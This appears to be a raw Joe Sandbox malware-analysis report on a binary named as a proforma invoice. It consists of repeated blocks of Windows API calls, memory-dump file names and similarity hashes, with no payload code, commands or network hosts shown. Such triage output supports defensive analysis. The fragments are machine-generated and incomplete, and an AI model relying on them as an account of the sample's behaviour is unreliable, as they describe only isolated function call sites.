                                                                                                                    • Instruction Fuzzy Hash: 6B5122786253028FDB54CF19C482A5ABBF1BB88355F54891CED858B320D731EC99CF86
APIs
• _memset.LIBCMT ref: 002C259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C25D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 11d7b9ad361e6b9f3807141cc9b4b7735c28c4f36da499539e3f704ed5faba8a
• Instruction ID: caeac654425855b65142b0c77a828af5fd02e827f3b289ca284b102d894ddfcb
• Instruction Fuzzy Hash: B4310771C20119EBCF01AFA4DC85EEEBBB9FF08310F100169ED15A6162DA315A69DF60
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 002D7B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D7B76
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 88c65b923efb08b8c11ada81880d46e6a6d3e382c904f5508f9939a042f2c8df
• Instruction ID: 411c802e9ba4e7711784fc13247558027277a1eab7f8511d1b2ed13b6285ecb4
• Instruction Fuzzy Hash: DD41F874A1520ADFDB14CF64C981BEABBB9FB09304F10416AE905AB391E774AD51CF90
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 002D6B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D6B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: e97de9aa269495bad4e81f167f6af61aa7f5bf48898c1faff9ee1db3764ee799
• Instruction ID: e9fbe32ef4b3199d69e283b571b73bd2a7550f986e5bace605ec24c57e5879f9
• Instruction Fuzzy Hash: BD31C171120204AEDB109F24CC44BFB77B8FF48764F10851AF9A5D7290DB30ACA1CB64
APIs
• _memset.LIBCMT ref: 002B2911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: b14d086e4842b3b533df38c3333cf84846776018b0d5aed5492bff7ebb37ab5b
• Instruction ID: 6099932dea692238dc2fc7d46ec46b00cc1b76d9f9d6f5c15ee1da5efacd4428
• Instruction Fuzzy Hash: 02312831A20706DFEB25CF48DC85BEEBBF8EF453D0F244019E999A61A0D7709968CB11
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D6761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 135190bddc8e2221944c58ddd04ec188c1dcabb349ec9edc6a7e87121659b76e
• Instruction ID: b48736cae8d974ed50ae83b5c36349be82e2ac6aaa9025b644e8e67031431706
• Instruction Fuzzy Hash: DC119071320209AFFF118F54DC89EBB776AEB883A8F10412AF91497391D675DC618BA0
APIs
  • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
  • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
  • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
• GetWindowRect.USER32(00000000,?), ref: 002D6C71
• GetSysColor.USER32(00000012), ref: 002D6C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: ddf482048e0d6f8378614c16e3cb2467b4f709bcdc25a4be30a65fc2c8c38f2b
• Instruction ID: fc84c55a6649309b1d3a3ace8aa5e35b72f262040a8a0d483f4bfb98e79cc54f
• Instruction Fuzzy Hash: A8212C7262020AAFDF04DFA8DD49AEA7BB8FB08315F00452AFD55D2250D735E860DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 002D69A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D69B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 7ba5bc0ed149b3c3ede0eb03c5996ec197761c15968d965328724cdc840b3f3a
• Instruction ID: ff356acedd500e80a464ebb1a9032ccaaa62e885e34674e72f267a6e3f9dab22
• Instruction Fuzzy Hash: 7611BC71520209ABEB108F74DC68AEB37AAEB053B4F504726F9A1972E0C771DC609B60
APIs
• _memset.LIBCMT ref: 002B2A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B2A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: a915cd34d3862aaa366f07711444ddd25dc407249a6229581fc0106646147543
• Instruction ID: a41dbca11019bee225483910cf26a6ed18fad56aa0a1c0b810ea5644e5934327
• Instruction Fuzzy Hash: B211D032921315EBCB31EF98DC44BEA73ACAB89380F144021E855E7291D770AD1EC792
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C222C
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2255
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
                                                                                                                    • Instruction ID: 1b38990732ce0666bfd38b4e6dfc7f713b033aea8ec747729318d829d7a32818
                                                                                                                    • Opcode Fuzzy Hash: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
                                                                                                                    • Instruction Fuzzy Hash: B211C170511226FADB258F118C98FF6FBACFB06361F10832EF90546000DAB05968D6F1
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • _wcscat.LIBCMT ref: 00294CB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                    • String ID: S1
                                                                                                                    • API String ID: 257928180-611949105
                                                                                                                    • Opcode ID: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
                                                                                                                    • Instruction ID: cdc382f3b5805817e6041889c4c420ff0ea99b15b26e16f7ef30602d3b52f629
                                                                                                                    • Opcode Fuzzy Hash: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
                                                                                                                    • Instruction Fuzzy Hash: 28110834A22209DB8B41FB60DC46FCE73FCEF08750B0044A2B948D3281EAB09BE85F14
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A8E73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
                                                                                                                    • Instruction ID: b17d059d7e4e0bad83b2f56e9a2d3964b456ab830f77515423673168c67aa919
                                                                                                                    • Opcode Fuzzy Hash: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
                                                                                                                    • Instruction Fuzzy Hash: 7301F5B1A62229EBCB15EBA0CD568FE7368EF02320B004619FC31572E2DF35582CCA50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: 6ebcc430636675c1374a6686b97d85153ac16b0aad82ef4bdec8e6dd1fd1ea15
                                                                                                                    • Instruction ID: 5b1071d64dfab84c8549a9d54578468e0fce9d2931b4b02a9772ce55e6cde98f
                                                                                                                    • Opcode Fuzzy Hash: 6ebcc430636675c1374a6686b97d85153ac16b0aad82ef4bdec8e6dd1fd1ea15
                                                                                                                    • Instruction Fuzzy Hash: C401F9718142187EDB18CBA8C856EEEBBFCDB15301F00419FF596D2181E9B5A6188B60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 002A8D6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
                                                                                                                    • Instruction ID: e1ec0d0d9bf1820ce4e0318d2d60f559b129129b4fe8c9c78318b61501a7db20
                                                                                                                    • Opcode Fuzzy Hash: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
                                                                                                                    • Instruction Fuzzy Hash: 7301FC71A61509ABCB15EBA0C956EFE73B8DF16300F104019BC01671E1DF255E2CDAB5
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 002A8DEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                    • Opcode ID: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
                                                                                                                    • Instruction ID: e96728436fc85187d87c277b480e94a574caf604755e0b6acffba640a8aa1699
                                                                                                                    • Opcode Fuzzy Hash: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
                                                                                                                    • Instruction Fuzzy Hash: 570126B1A62109B7CB11EBB4C956EFE77ACDF12300F104016BC02672D2DE255E2CDAB5
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002AC534
                                                                                                                      • Part of subcall function 002AC816: _memmove.LIBCMT ref: 002AC860
                                                                                                                      • Part of subcall function 002AC816: VariantInit.OLEAUT32(00000000), ref: 002AC882
                                                                                                                      • Part of subcall function 002AC816: VariantCopy.OLEAUT32(00000000,?), ref: 002AC88C
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002AC556
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                    • String ID: d}0
                                                                                                                    • API String ID: 2932060187-215453177
                                                                                                                    • Opcode ID: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
                                                                                                                    • Instruction ID: 84a4fdd3e458de975f682882b76b74c8e6228aa1c968249f9231d78e78af3c51
                                                                                                                    • Opcode Fuzzy Hash: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
                                                                                                                    • Instruction Fuzzy Hash: D8111E719017089FC720DFAAD98489AF7F8FF08310B50862FE58AD7651E771AA48CF94
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                    • String ID: #32770
                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                    • Opcode ID: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
                                                                                                                    • Instruction ID: bae78f4d98c0da86a9b09a71d68b0d8ec060a7c99022dc6b9296e4fbfaac8730
                                                                                                                    • Opcode Fuzzy Hash: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
                                                                                                                    • Instruction Fuzzy Hash: 7AE09232A012292AE720AB99AC4AAE7FBACEB45B70F000067FD44D3051D9709A558BE4
APIs
  • Part of subcall function 0028B314: _memset.LIBCMT ref: 0028B321
  • Part of subcall function 00270940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B2F0,?,?,?,0025100A), ref: 00270945
• IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B2FE
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00291775
  • Part of subcall function 002CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0029195E,?), ref: 002CBFFE
  • Part of subcall function 002CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0029196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002D5981
  • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D59AE
• PostMessageW.USER32(00000000), ref: 002D59B5
  • Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
